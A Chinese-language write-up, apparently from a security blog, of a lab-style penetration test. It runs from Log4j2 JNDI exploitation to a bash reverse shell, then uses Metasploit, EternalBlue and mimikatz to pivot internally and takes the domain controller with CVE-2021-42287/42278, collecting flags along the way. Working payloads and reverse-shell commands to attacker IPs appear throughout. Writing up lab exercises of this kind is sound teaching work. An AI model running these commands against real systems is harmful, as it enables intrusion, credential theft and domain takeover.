<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次log4j2引發的滲透

    VSole2022-01-06 15:43:06

    外網打點

    首先對web進行端口掃描,發現38080端口和22端口

    訪問一下38080端口發現是一個error page

    用Wappalyzer看一下是什么架構,但是好像沒有檢測出來

    拿著報錯去百度上發現應該是springboot

    索性用goby再去掃一下,應該是spring沒錯,但是沒有漏洞是什么操作?聯想到最近出的log4j2的洞,可能他只是一個日志文件所以并沒有框架

    使用

    payload=${jndi:ldap://p9j8l8.dnslog.cn}

    驗證一下有回顯證明存在漏洞

    嘗試進一步利用漏洞,首先起一個ldap服務,ip為本地接收shell的ip地址

    java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105
    

    抓包修改Content-Type: appllication/x-www-form-urlencoded

    并執行以下payload成功回顯

    payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}
    

    執行ls -al /看一下也成功

    nc開啟監聽端口

    然后使用bash命令反彈,這里需要先base64編碼然后對編碼后的特殊字符進行2層url轉碼

    bash -i >& /dev/tcp/192.168.1.105/9999 0>&1
    

    抓包添加payload=${jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base64/二層轉碼之后的字符},即可得到反彈shell

    進行信息搜集發現為docker環境,這里嘗試了docker逃逸失敗,那么繼續進行信息搜集

    在根目錄下找到了第一個flag,這里有一個got this,在之前端口掃描的時候看到開放了22端口,嘗試使用ssh直接連接

    使用xshell嘗試連接

    連接成功,拿到了宿主機的權限

    內網滲透

    ifconfig查看網卡情況發現還有一張10.0.1.0/24段的網卡

    這里方便的話其實可以使用cs上線linux后用cs繼續打,這里我就沒有上線cs,使用linux的命令對10.0.1.0/24段探測存貨主機

     for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done
    

    ping一下是存活的

    使用毒液把流量代理出來,首先開啟監聽

    admin.exe -lport 7777
    

    然后上傳agent_linux到靶機上

    加權并執行

    chmod 777 agent_linux_x86
    agent_linux_x86 -rhost 192.168.1.105 -rport 7777
    

    連接成功

    這里本來準備用毒液的代理到msf打的,后面覺得比較麻煩,就直接用kali生成的elf馬上線msf了

    首先生成一個32位的elf馬

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
    

    然后加權并執行

    chmod 777 shell.elf
    ./shell
    

    kali使用exploit/multi/handler進行監聽

    獲取到宿主機的shell

    然后添加10.0.1.0/24段的路由

    bg
    route add 10.0.1.0 255.255.255.0 1
    route print
    

    然后配置proxychain4.conf文件并使用socks模塊

    search socks
    use auxiliary/sevrer/socks_proxy
    run
    

    我們在之前已經知道了內網主機的ip,那么這里我們直接使用proxychain配合nmap對10.0.1.7的端口進行掃描

    proxychains4 nmap -sT -Pn 10.0.1.7
    

    發現有445端口,那么對445端口進一步掃描

    先確定一下系統版本,使用auxiliary/scanner/smb/smb_version模塊,發現是win7 sp1

    看能不能利用永恒之藍,這里使用到auxiliary/scanner/smb/smb_ms17_010模塊,發現可以利用永恒之藍

    使用exploit/windows/smb/ms17_010_eternalbule模塊,因為是不出網環境,這里需要用到bind_tcp載荷

    run之后拿到一個system權限的meterpreter

    C:\Users\root\Desktop下拿到第二個flag

    然后繼續進行信息搜集,發現同樣是雙網卡,還存在10.0.0.0/24段的一張網卡

    ipconfig /all看到dns服務器為redteam.lab應該在域內

    這里ping一下redteam.lab得到域控的ip為10.0.0.12

    這里不知道域控有什么洞,先上傳一個mimikatz把密碼抓取出來,得到Administrator/Admin12345,這里其實就可以使用域管賬戶ipc直接連接,但是這里抓到了一個域用戶,嘗試使用最新的CVE-2021-42287、CVE-2021-42278來進行攻擊,關于漏洞的原理請移步[1]

    privilege::debug
    sekurlsa::logonpasswords
    

    這里我準備使用noPac.exe直接去獲取一個shell的,但是這里noPac.exe的利用條件是需要主機上有.net4.0環境,所以這里沒有回顯

    noPac.exe下載地址:https://github.com/cube0x0/noPac

    本來準備一步一步的用原始的方法打的,但是powershell用不了沒有回顯,就寫一下原始利用的步驟吧

    1.首先創建一個機器賬戶,可以使用 impacket 的 addcomputer.py或是powermad
    addcomputer.py是利用SAMR協議創建機器賬戶,這個方法所創建的機器賬戶沒有SPN,所以可以不用清除
    2.清除機器賬戶的servicePrincipalName屬性
    3.將機器賬戶的sAMAccountName,更改為DC的機器賬戶名字,注意后綴不帶$
    4.為機器賬戶請求TGT
    5.將機器賬戶的sAMAccountName更改為其他名字,不與步驟3重復即可
    6.通過S4U2self協議向DC請求ST
    7.進行 DCsync Attack
    

    這里直接使用sam_the_admin.py[2]進行攻擊

    proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
    

    即可拿到DC的shell

    C:\Users\Administrator\Desktop下找到最后一個flag

    payloadshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    從某新生賽入門PWN
    2022-11-26 16:02:34
    本文為看雪論壇優秀文章看雪論壇作者ID:bad_c0de在某平臺上看到了質量不錯的新生賽,難度也比較適宜,因此嘗試通過該比賽進行入門,也將自己所學分享給大家。賽題ezcmp賽題分析該程序的C代碼如下,因此我們只要使buff和test的前三十個字節相同即可。因此可以直接在比較處下斷點查看buff數組的值即可。#includechar buff[100];int v0;char buffff[]="ABCDEFGHIJKLMNOPQRSTUVWXYZ1234";char bua[]="abcdefghijklmnopqrstuvwxyz4321";char* enccrypt{ int a; for{ a=rand(); buf[i]^=buffff[i]; buff[i]^=bua[i]; for{ buf[j]=buff[i]; buf[i]+='2'; } buf[i]-=&0xff; buf[i]+=&0xff; }}int main(){ setbuf; setbuf; setbuf; puts; char buf[]="Ayaka_nbbbbbbbbbbbbbbbbb_pluss"; strcpy; char test[30]; int v0=1; srand; enccrypt; read; if(!ezr0p64賽題分析查看保護同理可以通過rop進行繞過。
    shellcode 讀取 secret 文件內容并輸出,比誰用的字符更少,字符數相同時比誰的長度更短。
    0x01 前言之前接觸tp5的站比較少,只知道利用RCE漏洞getshell的方式。在最近對一個發卡平臺滲透的過程中,由于php版本限制,無法直接使用RCE的payloadshell,于是結合該網站盡可能多的測試一下tp5+php7.1環境下的getshell方法。
    ?Cobalt Strike基礎使用
    2021-10-28 08:48:39
    Cobalt Strike分為客戶端組件和服務器組件,服務器的組件也是團隊服務器,可以放在局域網或者公網下進行團隊使用,也是Cobalt Strike社會工程功能的托管機器,團隊服務器還可以存儲由Cobalt Strike收集的數據,并且進行日志管理。其支持多主機連接,部署好Beacon后提交一個要連回的域名或主機的列表,Beacon將通過這些主機輪詢。
    第 2 章 shell權限提升,簡稱提權。它用于執行各種網絡交互,包括在枚舉期間抓取 banner 等。但它們默認情況下很少安裝 Socat。模塊與 socat 和 netcat 一樣,提供了用于接收反彈 shell 的功能。雖然 msfvenom 可以生成除 reverse 和 bind shell 之外的 payload,但這不是本文的重點。一般情況下,反向 shell 更容易執行和調試。以下會給出反彈 shell 和 正向 shell 的示例,請注意它們間的區別。這里重要的是我們正在攻擊機上監聽,并收到了來自目標的連接。請注意,這并非特定于 Windows。
    #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于已經有了一個不需要再產生一個,所以這里設置為true. #這里是當前獲得的session的id. 可以看到 cs 成功接收到 shell右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木馬首先創建監聽器用于木馬回連,Host 為 cs 服務端的 ipAttacks->Packages->Windows Executable?需要派生的目標右擊選擇Spawn,然后創建一個?
    免殺,又叫免殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。
    再開始今天的內容之前,首先理解一個東西 WebDav,WebDAV 一種基于 HTTP 1.1協議的通信協議。命令能告訴我們目標系統使用的是 python2 還是 python3。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类